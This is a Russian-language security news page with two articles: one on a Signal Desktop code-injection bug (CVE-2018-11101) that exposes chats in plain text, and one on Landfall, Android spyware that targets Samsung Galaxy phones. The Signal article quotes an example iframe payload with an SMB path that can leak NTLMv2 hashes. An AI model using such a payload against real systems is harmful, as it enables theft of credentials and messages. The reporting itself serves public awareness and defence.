Новый баг в Signal позволяет получить переписку в виде простого текста

Новый баг в Signal позволяет получить переписку в виде простого текста

Новый баг в Signal позволяет получить переписку в виде простого текста

Второй раз за неделю пользователям приложения для обмена сообщениями Signal придется обновлять свои инсталляции программы, так как разработчики устранили еще одну серьезную уязвимость, способную привести к инъекции злонамеренного кода.

Для эксплуатации этого бага злоумышленнику нужно всего лишь отправить специальное текстовое сообщение на десктопную версию мессенджера. При этом взаимодействие с пользователем совершенно не требуется.

Новая уязвимость получила идентификатор CVE-2018-11101, она находится в функции, отвечающей за проверку цитируемых сообщений.

Другими словами, все, что потребуется злоумышленнику, — отправить вредоносный код HTML-JavaScript в качестве сообщения жертве, а затем процитировать — и, соответственно, ответить — на это сообщение случайным текстом.

Получив это сообщение, настольная версия клиента Signal выполнит вредоносную составляющую без всякого взаимодействия с пользователем. Эксперты опубликовали видео, на котором демонстрируется успешная атака на Signal.

Исследователям также удалось создать новый PoC-эксплойт, который позволяет удаленно похитить все беседы жертвы в Signal. Причем эти беседы будут получены злоумышленником в виде простого текста.

Стало быть, данная атака сводит на нет сквозное шифрование, применяемое в Signal.

Но и это еще не все. Специалисты отметили, что злоумышленник может подключить файлы, используя тег iFrame и попытаться похитить хеш пароля NTLMv2 пользователей Windows.

«В операционной системе Windows политика защиты контента (CSP) не может предотвратить удаленное подключение файлов через SMB-протокол. В этом случае атакующий может удаленно запустить JavaScript, указав его в качестве источника в теге iframe, например: <iframe src=\\DESKTOP-XXXXX\Temp\test.html>», — пишут исследователи.

Эксперты полагают, что киберпреступник может использовать инъекцию кода, чтобы заставить Windows инициировать автоматическую проверку подлинности с SMB-сервером, что приведет к передаче имени пользователя и хеша пароля NTLMv2 атакующему.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Android-шпион Landfall год следил за владельцами Samsung Galaxy

Эксперты Palo Alto Networks Unit 42 обнаружили новый шпионский софт для Android, который на протяжении почти года тайно заражал смартфоны Samsung Galaxy. Вредонос получил имя Landfall. Исследователи выяснили, что Landfall использовал 0-day (CVE-2025-21042) в программном обеспечении Galaxy. На момент атаки Samsung о ней не знала.

Для заражения злоумышленникам было достаточно отправить жертве изображение, специально подготовленное для эксплуатации уязвимости — без необходимости что-либо открывать или нажимать.

Компания закрыла дыру только в апреле 2025 года, однако атаки, по данным Unit 42, начались ещё в июле 2024-го.

По словам исследователя Итая Коэна, кибероперации были «точечными» и нацеливались на конкретных людей, а не на массовое распространение вредоноса. Это говорит о том, что речь идёт о таргетированных атаках, вероятно с элементами киберразведки.

Landfall, как и другие правительственные шпионские инструменты, мог получать доступ к данным жертвы, включая фотографии, сообщения, контакты, звонки, а также включать микрофон и отслеживать геолокацию.

Семплы вредоноса были загружены на VirusTotal пользователями из Марокко, Ирана, Ирака и Турции. Турецкая команда реагирования USOM уже признала один из IP-адресов, связанных с Landfall, вредоносным. Это подтверждает, что атаки могли затронуть пользователей в Турции.

Интересная деталь: инфраструктура, используемая в кампании Landfall, пересекается с инфраструктурой шпионского проекта Stealth Falcon, который ранее применялся против журналистов и активистов из ОАЭ. Однако доказательств, позволяющих напрямую связать Landfall с этим актором, пока нет.

Код Landfall содержит упоминания пяти моделей Galaxy, включая S22, S23, S24 и некоторые Z-модели. По данным Unit 42, уязвимость могла также затрагивать другие устройства Samsung с Android 13–15.

Компания Samsung пока не прокомментировала результаты расследования.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru